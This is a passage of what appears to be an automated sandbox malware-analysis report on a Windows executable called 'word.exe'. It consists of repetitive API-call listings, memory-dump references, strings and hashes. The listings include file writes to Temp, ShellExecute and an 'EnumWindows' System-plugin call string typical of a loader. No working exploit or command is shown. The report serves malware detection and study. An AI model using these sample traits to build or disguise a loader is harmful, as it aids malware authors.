                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: CharItemText$Next$Free$BrowseDiskFolderPrevSpaceTaskWindowlstrcatlstrcmpi
                                                          • String ID: +/R$A$C:\Users\user\spherosome\preadoption\preembodiment$Call$user32::EnumWindows(i r1 ,i 0)
                                                          • API String ID: 2246997448-1321296175
                                                          • Opcode ID: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
                                                          • Instruction ID: 255f07ea732f9d77aa63c61f9e9bd72d052a515538c5e386bff86aa800b3dd0f
                                                          • Opcode Fuzzy Hash: 476c68135541f7995d7e7312d009b35f143366a4d6393fc4d548ff83450bdccd
                                                          • Instruction Fuzzy Hash: 5A9172B1900219BBDB11AFA1CD85AAF76B8EF85304F10843BFB01B72D1D77C99418B69
                                                          APIs
                                                          • FindFirstFileA.KERNEL32(00000000,?,00000002), ref: 00402654
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: FileFindFirst
                                                          • String ID:
                                                          • API String ID: 1974802433-0
                                                          • Opcode ID: e358676071c9ad12ca9a4f5b1acad345144818a224037d499fe1875a9964c843
                                                          • Instruction ID: e095c2a4769a5e18af137d5e24cc0f066a76803936003d94c8e443da5dd33856
                                                          • Opcode Fuzzy Hash: e358676071c9ad12ca9a4f5b1acad345144818a224037d499fe1875a9964c843
                                                          • Instruction Fuzzy Hash: 58F0EC72508110EBD700E77499499EE7778DF51314F60457BF141F21C1D3B84941EB2A
                                                          APIs
                                                          • SetWindowPos.USER32(?,00000000,00000000,00000000,00000000,00000013), ref: 00403B55
                                                          • ShowWindow.USER32(?), ref: 00403B72
                                                          • DestroyWindow.USER32 ref: 00403B86
                                                          • SetWindowLongA.USER32(?,00000000,00000000), ref: 00403BA2
                                                          • GetDlgItem.USER32(?,?), ref: 00403BC3
                                                          • SendMessageA.USER32(00000000,000000F3,00000000,00000000), ref: 00403BD7
                                                          • IsWindowEnabled.USER32(00000000), ref: 00403BDE
                                                          • GetDlgItem.USER32(?,00000001), ref: 00403C8C
                                                          • GetDlgItem.USER32(?,00000002), ref: 00403C96
                                                          • SetClassLongA.USER32(?,000000F2,?), ref: 00403CB0
                                                          • SendMessageA.USER32(0000040F,00000000,00000001,?), ref: 00403D01
                                                          • GetDlgItem.USER32(?,00000003), ref: 00403DA7
                                                          • ShowWindow.USER32(00000000,?), ref: 00403DC8
                                                          • EnableWindow.USER32(?,?), ref: 00403DDA
                                                          • EnableWindow.USER32(?,?), ref: 00403DF5
                                                          • GetSystemMenu.USER32(?,00000000,0000F060,00000001), ref: 00403E0B
                                                          • EnableMenuItem.USER32(00000000), ref: 00403E12
                                                          • SendMessageA.USER32(?,?,00000000,00000001), ref: 00403E2A
                                                          • SendMessageA.USER32(?,00000401,00000002,00000000), ref: 00403E3D
                                                          • lstrlenA.KERNEL32(0041FCF8,?,0041FCF8,00422F00), ref: 00403E66
                                                          • SetWindowTextA.USER32(?,0041FCF8), ref: 00403E75
                                                          • ShowWindow.USER32(?,0000000A), ref: 00403FA9
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Window$Item$MessageSend$EnableShow$LongMenu$ClassDestroyEnabledSystemTextlstrlen
                                                          • String ID:
                                                          • API String ID: 184305955-0
                                                          • Opcode ID: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
                                                          • Instruction ID: 153bf0bbc826156ff643e1a37e17b62c3978853f10e30dc38cd17efbe60f3484
                                                          • Opcode Fuzzy Hash: 27ef697ed585f907fa2005ca557fe715e2cd5084a56b06754159dcce861c4f01
                                                          • Instruction Fuzzy Hash: 00C1D071A04205BBDB21AF21ED44E2B7EBCFB4470AF40443EF601B11E1C7799942AB6E
                                                          APIs
                                                          • CheckDlgButton.USER32(00000000,-0000040A,00000001), ref: 004041C0
                                                          • GetDlgItem.USER32(00000000,000003E8), ref: 004041D4
                                                          • SendMessageA.USER32(00000000,0000045B,00000001,00000000), ref: 004041F2
                                                          • GetSysColor.USER32(?), ref: 00404203
                                                          • SendMessageA.USER32(00000000,00000443,00000000,?), ref: 00404212
                                                          • SendMessageA.USER32(00000000,00000445,00000000,04010000), ref: 00404221
                                                          • lstrlenA.KERNEL32(?), ref: 00404224
                                                          • SendMessageA.USER32(00000000,00000435,00000000,00000000), ref: 00404233
                                                          • SendMessageA.USER32(00000000,00000449,?,00000110), ref: 00404248
                                                          • GetDlgItem.USER32(?,0000040A), ref: 004042AA
                                                          • SendMessageA.USER32(00000000), ref: 004042AD
                                                          • GetDlgItem.USER32(?,000003E8), ref: 004042D8
                                                          • SendMessageA.USER32(00000000,0000044B,00000000,00000201), ref: 00404318
                                                          • LoadCursorA.USER32(00000000,00007F02), ref: 00404327
                                                          • SetCursor.USER32(00000000), ref: 00404330
                                                          • ShellExecuteA.SHELL32(0000070B,open,004226A0,00000000,00000000,00000001), ref: 00404343
                                                          • LoadCursorA.USER32(00000000,00007F00), ref: 00404350
                                                          • SetCursor.USER32(00000000), ref: 00404353
                                                          • SendMessageA.USER32(00000111,00000001,00000000), ref: 0040437F
                                                          • SendMessageA.USER32(?,00000000,00000000), ref: 00404393
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: MessageSend$Cursor$Item$Load$ButtonCheckColorExecuteShelllstrlen
                                                          • String ID: +/R$Call$N$open
                                                          • API String ID: 3615053054-2612674847
                                                          • Opcode ID: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                                          • Instruction ID: e12ca537bcd72e8a05bc460f10c87f41301461b9037796019f3247b39f6fe1bc
                                                          • Opcode Fuzzy Hash: aa854a75b9a8ef41e2656ff54a1ab69c816baf86c41e2f577b142ace3155aca6
                                                          • Instruction Fuzzy Hash: 9361A0B1A40209BFEB109F61DD45F6A7B69FB84704F108026FB04BB2D1C7B8A951CB99
                                                          APIs
                                                          • lstrcpyA.KERNEL32(00421A88,NUL,?,00000000,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A39
                                                          • CloseHandle.KERNEL32(00000000,00000000,00000000,00000001,?,00000000,?,00405BCD,?,?,00000001,00405770,?,00000000,000000F1,?), ref: 00405A5D
                                                          • GetShortPathNameA.KERNEL32(00000000,00421A88,00000400), ref: 00405A66
                                                            • Part of subcall function 004058E7: lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 004058F7
                                                            • Part of subcall function 004058E7: lstrlenA.KERNEL32(00405B16,?,00000000,00405B16,00000000,[Rename],00000000,00000000,00000000), ref: 00405929
                                                          • GetShortPathNameA.KERNEL32(?,00421E88,00000400), ref: 00405A83
                                                          • wsprintfA.USER32 ref: 00405AA1
                                                          • GetFileSize.KERNEL32(00000000,00000000,00421E88,C0000000,?,00421E88,?,?,?,?,?), ref: 00405ADC
                                                          • GlobalAlloc.KERNEL32(?,0000000A), ref: 00405AEB
                                                          • lstrcpyA.KERNEL32(00000000,[Rename],00000000,[Rename],00000000,00000000,00000000), ref: 00405B23
                                                          • SetFilePointer.KERNEL32(?,00000000,00000000,00000000,00000000,00421688,00000000,-0000000A,004093A0,00000000,[Rename],00000000,00000000,00000000), ref: 00405B79
                                                          • WriteFile.KERNEL32(?,00000000,00000000,?,00000000), ref: 00405B8B
                                                          • GlobalFree.KERNEL32(00000000), ref: 00405B92
                                                          • CloseHandle.KERNEL32(00000000), ref: 00405B99
                                                            • Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
                                                            • Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$CloseGlobalHandleNamePathShortlstrcpylstrlen$AllocAttributesCreateFreePointerSizeWritewsprintf
                                                          • String ID: %s=%s$NUL$[Rename]
                                                          • API String ID: 1265525490-4148678300
                                                          • Opcode ID: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
                                                          • Instruction ID: b425f8375b2a923a6c6e646106298c69547d2110189afc57e8bc93149b7758b2
                                                          • Opcode Fuzzy Hash: f37ac594430da83018f04a4547826f7a07ed016582ff29ad24a376af527490d1
                                                          • Instruction Fuzzy Hash: 2D41EE71A04A15AFD2206B219C49F6B3A6CDF45725F14013ABE06F62D2DA7CB8008E7D
                                                          APIs
                                                          • DefWindowProcA.USER32(?,00000046,?,?), ref: 0040102C
                                                          • BeginPaint.USER32(?,?), ref: 00401047
                                                          • GetClientRect.USER32(?,?), ref: 0040105B
                                                          • CreateBrushIndirect.GDI32(00000000), ref: 004010CF
                                                          • FillRect.USER32(00000000,?,00000000), ref: 004010E4
                                                          • DeleteObject.GDI32(?), ref: 004010ED
                                                          • CreateFontIndirectA.GDI32(?), ref: 00401105
                                                          • SetBkMode.GDI32(00000000,00000001), ref: 00401126
                                                          • SetTextColor.GDI32(00000000,000000FF), ref: 00401130
                                                          • SelectObject.GDI32(00000000,?), ref: 00401140
                                                          • DrawTextA.USER32(00000000,00422F00,000000FF,00000010,00000820), ref: 00401156
                                                          • SelectObject.GDI32(00000000,00000000), ref: 00401160
                                                          • DeleteObject.GDI32(?), ref: 00401165
                                                          • EndPaint.USER32(?,?), ref: 0040116E
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Object$CreateDeleteIndirectPaintRectSelectText$BeginBrushClientColorDrawFillFontModeProcWindow
                                                          • String ID: F
                                                          • API String ID: 941294808-1304234792
                                                          • Opcode ID: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                                          • Instruction ID: ce5436bc7dfccdabf5b2378cdbc04c65b8fc1f8d51739f20964cb8902a5fcb59
                                                          • Opcode Fuzzy Hash: c2d680870d7abd1e1a74e136b5aebc8f23ebe5596e06de1d1944de18111d68fb
                                                          • Instruction Fuzzy Hash: F2419A72804249AFCF058F94CD459AFBFB9FF44310F00812AF961AA1A0C738EA50DFA5
                                                          APIs
                                                          • CharNextA.USER32(?,*?|<>/":,00000000,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FB4
                                                          • CharNextA.USER32(?,?,?,00000000), ref: 00405FC1
                                                          • CharNextA.USER32(?,"C:\Users\user\Desktop\word.exe",C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FC6
                                                          • CharPrevA.USER32(?,?,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00000000,004031EF,C:\Users\user\AppData\Local\Temp\,77583410,004033C9), ref: 00405FD6
                                                          Strings
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Char$Next$Prev
                                                          • String ID: "C:\Users\user\Desktop\word.exe"$*?|<>/":$C:\Users\user\AppData\Local\Temp\
                                                          • API String ID: 589700163-3317864059
                                                          • Opcode ID: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
                                                          • Instruction ID: 7b30a10291eb0396c8f4e95b118cc70be9f64314849ede57e52aca42a9cf7d7a
                                                          • Opcode Fuzzy Hash: 8e6880dbf60680850995486114707e5442f3544b6a214aee6d9330f98436af3b
                                                          • Instruction Fuzzy Hash: 9E11C451808B962AEB3216344C44F77BF99CF56760F18007BE9C4B22C2D67C5C429B6D
                                                          APIs
                                                          • GetWindowLongA.USER32(?,000000EB), ref: 00404070
                                                          • GetSysColor.USER32(00000000), ref: 0040408C
                                                          • SetTextColor.GDI32(?,00000000), ref: 00404098
                                                          • SetBkMode.GDI32(?,?), ref: 004040A4
                                                          • GetSysColor.USER32(?), ref: 004040B7
                                                          • SetBkColor.GDI32(?,?), ref: 004040C7
                                                          • DeleteObject.GDI32(?), ref: 004040E1
                                                          • CreateBrushIndirect.GDI32(?), ref: 004040EB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
                                                          • String ID:
                                                          • API String ID: 2320649405-0
                                                          • Opcode ID: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                          • Instruction ID: 47825c477eeffae7bcc1b4b45db8633c52535f80fcd06c8b97140eed864a5805
                                                          • Opcode Fuzzy Hash: 059a6408e4ff7a7a286042baf0ba0b6777dcdd2840b1e709c5bb58eb991f2f1d
                                                          • Instruction Fuzzy Hash: 0621A4B18047049BCB309F68DD08B4BBBF8AF40714F048639EA95F26E1C738E944CB65
                                                          APIs
                                                          • GlobalFree.KERNEL32(00000000), ref: 1000234A
                                                            • Part of subcall function 10001224: lstrcpynA.KERNEL32(00000000,?,100012CF,-1000404B,100011AB,-000000A0), ref: 10001234
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 100022C3
                                                          • MultiByteToWideChar.KERNEL32(00000000,00000000,?,?,00000000,?), ref: 100022D8
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 100022E7
                                                          • CLSIDFromString.OLE32(00000000,00000000), ref: 100022F4
                                                          • GlobalFree.KERNEL32(00000000), ref: 100022FB
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$AllocFree$ByteCharFromMultiStringWidelstrcpyn
                                                          • String ID:
                                                          • API String ID: 3730416702-0
                                                          • Opcode ID: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                                                          • Instruction ID: fe65b043c70383bd2b49c92c90746d4950a0c6047a38c1932a2dc3020861886a
                                                          • Opcode Fuzzy Hash: 5812f53bea9c9c9f79666072e50bc0f3831b96dbb387c6cf78516ccbd9521935
                                                          • Instruction Fuzzy Hash: F6418BB1108711EFF720DFA48884B5BB7F8FF443D1F218929F946D61A9DB34AA448B61
                                                          APIs
                                                            • Part of subcall function 10001215: GlobalAlloc.KERNELBASE(?,10001233,?,100012CF,-1000404B,100011AB,-000000A0), ref: 1000121D
                                                          • GlobalFree.KERNEL32(?), ref: 100024B9
                                                          • GlobalFree.KERNEL32(00000000), ref: 100024F3
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1815724658.0000000010001000.00000020.00000001.01000000.00000006.sdmp, Offset: 10000000, based on PE: true
                                                          • Associated: 00000000.00000002.1815689617.0000000010000000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815766207.0000000010003000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          • Associated: 00000000.00000002.1815813652.0000000010005000.00000002.00000001.01000000.00000006.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_10000000_word.jbxd
                                                          Similarity
                                                          • API ID: Global$Free$Alloc
                                                          • String ID:
                                                          • API String ID: 1780285237-0
                                                          • Opcode ID: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                                                          • Instruction ID: 82133e1bc6da927614d5bcfc3b496831b4cb396c3e6da136b8b2dca3161aa200
                                                          • Opcode Fuzzy Hash: 28705be4039c1f606362c20ff13fdce37c258c5b4734a68cc6567389004174f8
                                                          • Instruction Fuzzy Hash: 75319CB1504251EFF722CF94CCC4C6B7BBDEB852D4B128569FA4193228DB31AC54DB62
                                                          APIs
                                                            • Part of subcall function 00405982: GetFileAttributesA.KERNELBASE(00000003,00402CBC,C:\Users\user\Desktop\word.exe,80000000,00000003), ref: 00405986
                                                            • Part of subcall function 00405982: CreateFileA.KERNELBASE(?,?,00000001,00000000,?,00000001,00000000), ref: 004059A8
                                                          • GlobalAlloc.KERNEL32(?,?), ref: 004026D7
                                                          • CloseHandle.KERNEL32(?), ref: 0040275D
                                                            • Part of subcall function 004031CC: SetFilePointer.KERNELBASE(00000000,00000000,00000000,00402EA4,?), ref: 004031DA
                                                          • GlobalAlloc.KERNEL32(?,?,00000000,?), ref: 004026F3
                                                          • GlobalFree.KERNEL32(?), ref: 0040272C
                                                          • WriteFile.KERNEL32(?,00000000,?,?), ref: 0040273E
                                                          • GlobalFree.KERNEL32(00000000), ref: 00402745
                                                            • Part of subcall function 00402F1F: SetFilePointer.KERNELBASE(00409130,00000000,00000000,00000000,00000000,?,?,?,00402ECB,000000FF,00000000,00000000,00409130,?), ref: 00402F45
                                                            • Part of subcall function 00402F1F: WriteFile.KERNELBASE(00000000,004128A0,?,000000FF,00000000,004128A0,00004000,00409130,00409130,?,00000004,00000000,00000000,?,?), ref: 00402FD2
                                                          • DeleteFileA.KERNEL32(?), ref: 00402771
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000429000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000435000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000437000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793188995.0000000000447000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          Joe Sandbox IDA Plugin
                                                          • Snapshot File: hcaresult_0_2_400000_word.jbxd
                                                          Similarity
                                                          • API ID: File$Global$AllocFreePointerWrite$AttributesCloseCreateDeleteHandle
                                                          • String ID:
                                                          • API String ID: 64603807-0
                                                          • Opcode ID: f5572cba1f41e56528db20e94bb2b414aea4885ca7313004b5803c0666e82ddc
                                                          • Instruction ID: 39d681308be84b49fc043c668352bfd213fb34ea520f048123e5f65a43450375
                                                          • Opcode Fuzzy Hash: f5572cba1f41e56528db20e94bb2b414aea4885ca7313004b5803c0666e82ddc
                                                          • Instruction Fuzzy Hash: 77218C71C00118BFCF116FA4CD88CAEBE79EF08364B10423AF520772E0C6795D419BA8
                                                          APIs
                                                          • lstrlenA.KERNEL32(0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000,?), ref: 00405015
                                                          • lstrlenA.KERNEL32(00402C51,0041F4D8,00000000,00000000,00000000,?,?,?,?,?,?,?,?,?,00402C51,00000000), ref: 00405025
                                                          • lstrcatA.KERNEL32(0041F4D8,00402C51,00402C51,0041F4D8,00000000,00000000,00000000), ref: 00405038
                                                          • SetWindowTextA.USER32(0041F4D8,0041F4D8), ref: 0040504A
                                                          • SendMessageA.USER32(?,00001004,00000000,00000000), ref: 00405070
                                                          • SendMessageA.USER32(?,00001007,00000000,00000001), ref: 0040508A
                                                          • SendMessageA.USER32(?,00001013,?,00000000), ref: 00405098
                                                          Memory Dump Source
                                                          • Source File: 00000000.00000002.1792949895.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                          • Associated: 00000000.00000002.1792920421.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1792982196.0000000000407000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000409000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                          • Associated: 00000000.00000002.1793018183.0000000000421000.00000004.00000001.01000000.00000003.sdmpDownload File
